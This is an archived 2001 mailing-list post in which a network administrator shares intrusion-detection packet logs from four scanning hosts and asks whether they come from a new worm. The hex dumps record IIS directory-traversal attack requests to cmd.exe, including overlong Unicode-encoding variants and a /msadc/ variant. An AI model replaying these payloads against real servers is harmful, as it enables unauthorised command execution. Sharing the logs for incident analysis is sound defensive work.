I got these 4 attempts from different sources in a rather small window of time. They all start out with a portscan of port 80, so I don't think it is the same person (Why would they need to rescan each time?). You will note that the order of the variation of the attempts is similar. Is this a new worm? A new tool? -Steve ----------------BEGIN SCAN REPORTS---------------------- *****************************SCAN #1***************************************** ---------------------------------------------------------------------------- -- #(1 - 2059) [2001-05-05 21:20:45] 305 IPv4: 207.51.58.7 -> 209.46.94.85 hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810 TCP: port=41385 -> dport: 80 flags=******S* seq=3959699664 ack=0 off=6 res=0 win=8760 urp=0 chksum=30305 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2081) [2001-05-06 12:06:16] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174 TCP: port=42384 -> dport: 80 flags=***AP*** seq=4087665554 ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2082) [2001-05-06 12:06:17] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168 TCP: port=42746 -> dport: 80 flags=***AP*** seq=4111537358 ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2083) [2001-05-06 12:06:18] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162 TCP: port=43046 -> dport: 80 flags=***AP*** seq=4129406045 ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2084) [2001-05-06 12:06:19] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156 TCP: port=44051 -> dport: 80 flags=***AP*** seq=4191243658 ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2085) [2001-05-06 12:06:20] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150 TCP: port=45036 -> dport: 80 flags=***AP*** seq=4254676574 ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2086) [2001-05-06 12:06:21] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144 TCP: port=45723 -> dport: 80 flags=***AP*** seq=3643186 ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2087) [2001-05-06 12:06:22] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138 TCP: port=46489 -> dport: 80 flags=***AP*** seq=54010263 ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2088) [2001-05-06 12:06:23] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132 TCP: port=47320 -> dport: 80 flags=***AP*** seq=104581118 ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2089) [2001-05-06 12:06:24] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126 TCP: port=48175 -> dport: 80 flags=***AP*** seq=160395667 ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2090) [2001-05-06 12:06:25] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117 TCP: port=49033 -> dport: 80 flags=***AP*** seq=213665368 ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432 Payload: length = 63 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2091) [2001-05-06 12:06:26] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108 TCP: port=49954 -> dport: 80 flags=***AP*** seq=270239886 ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899 Payload: length = 64 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/... 010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst 020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2092) [2001-05-06 12:06:27] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099 TCP: port=50870 -> dport: 80 flags=***AP*** seq=328007726 ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280 Payload: length = 65 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/... 010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys 020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0... 040 : 0A . ---------------------------------------------------------------------------- -- #(1 - 2093) [2001-05-06 12:06:28] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090 TCP: port=51840 -> dport: 80 flags=***AP*** seq=378946693 ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453 Payload: length = 66 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/... 010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy 020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 040 : 0D 0A .. ---------------------------------------------------------------------------- -- #(1 - 2094) [2001-05-06 12:06:29] 56 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067 TCP: port=52623 -> dport: 80 flags=***AP*** seq=427404423 ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179 Payload: length = 77 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0 010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8 020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0.... ****************************SCAN #2******************************************* ---------------------------------------------------------------------------- -- #(1 - 2075) [2001-05-06 11:25:12] 317 IPv4: 207.78.143.235 -> 209.46.94.85 hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438 TCP: port=56344 -> dport: 80 flags=******S* seq=823530689 ack=0 off=6 res=0 win=8760 urp=0 chksum=50416 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2121) [2001-05-06 18:08:07] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155 TCP: port=57118 -> dport: 80 flags=***AP*** seq=3412786496 ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2122) [2001-05-06 18:08:07] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149 TCP: port=57170 -> dport: 80 flags=***AP*** seq=3415977274 ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2123) [2001-05-06 18:08:18] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140 TCP: port=57326 -> dport: 80 flags=***AP*** seq=3426276033 ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2124) [2001-05-06 18:08:18] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135 TCP: port=64799 -> dport: 80 flags=***AP*** seq=3904402609 ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2125) [2001-05-06 18:08:28] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126 TCP: port=65302 -> dport: 80 flags=***AP*** seq=3936366689 ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2126) [2001-05-06 18:08:29] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120 TCP: port=39706 -> dport: 80 flags=***AP*** seq=107054918 ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2127) [2001-05-06 18:08:29] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114 TCP: port=39709 -> dport: 80 flags=***AP*** seq=107263367 ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2128) [2001-05-06 18:08:29] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108 TCP: port=39965 -> dport: 80 flags=***AP*** seq=124410128 ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2129) [2001-05-06 18:08:30] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102 TCP: port=40329 -> dport: 80 flags=***AP*** seq=148806580 ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2130) [2001-05-06 18:08:34] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090 TCP: port=40585 -> dport: 80 flags=***AP*** seq=164770468 ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492 Payload: length = 63 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2131) [2001-05-06 18:08:34] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081 TCP: port=43268 -> dport: 80 flags=***AP*** seq=341732227 ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755 Payload: length = 64 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/... 010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst 020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2132) [2001-05-06 18:08:38] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071 TCP: port=43341 -> dport: 80 flags=***AP*** seq=346538415 ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319 Payload: length = 65 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/... 010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys 020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0... 040 : 0A . ---------------------------------------------------------------------------- -- #(1 - 2133) [2001-05-06 18:08:38] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062 TCP: port=46205 -> dport: 80 flags=***AP*** seq=530846163 ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548 Payload: length = 66 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/... 010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy 020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 040 : 0D 0A .. ---------------------------------------------------------------------------- -- #(1 - 2134) [2001-05-06 18:08:42] 56 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037 TCP: port=46362 -> dport: 80 flags=***AP*** seq=541605131 ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033 Payload: length = 77 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0 010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8 020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0.... ***************************SCAN #3********************************************************** ---------------------------------------------------------------------------- -- #(1 - 2147) [2001-05-07 02:22:21] spp_portscan: PORTSCAN DETECTED from 210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds) IPv4: 210.107.187.10 -> 209.46.94.85 hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652 TCP: port=50799 -> dport: 80 flags=******S* seq=2338995863 ack=0 off=6 res=0 win=8760 urp=0 chksum=10291 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2181) [2001-05-07 12:01:30] WEB-IIS cmd.exe access IPv4: 210.107.187.10 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485 TCP: port=61125 -> dport: 80 flags=***AP*** seq=941135384 ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2182) [2001-05-07 12:01:31] WEB-IIS cmd.exe access IPv4: 210.107.187.10 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479 TCP: port=61278 -> dport: 80 flags=***AP*** seq=951451170 ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ************************SCAN #4******************************************* #(1 - 2150) [2001-05-07 03:07:07] 340 IPv4: 202.107.211.177 -> 209.46.94.80 hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406 TCP: port=56725 -> dport: 80 flags=******S* seq=3486124858 ack=0 off=6 res=0 win=8760 urp=0 chksum=61287 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2173) [2001-05-07 10:15:58] 62 IPv4: 202.107.211.177 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492 TCP: port=32840 -> dport: 80 flags=***AP*** seq=1452480610 ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2174) [2001-05-07 10:16:00] 62 IPv4: 202.107.211.177 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486 TCP: port=33972 -> dport: 80 flags=***AP*** seq=1515064652 ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
This archive was generated by hypermail 2b30 : Tue May 08 2001 - 07:59:32 PDT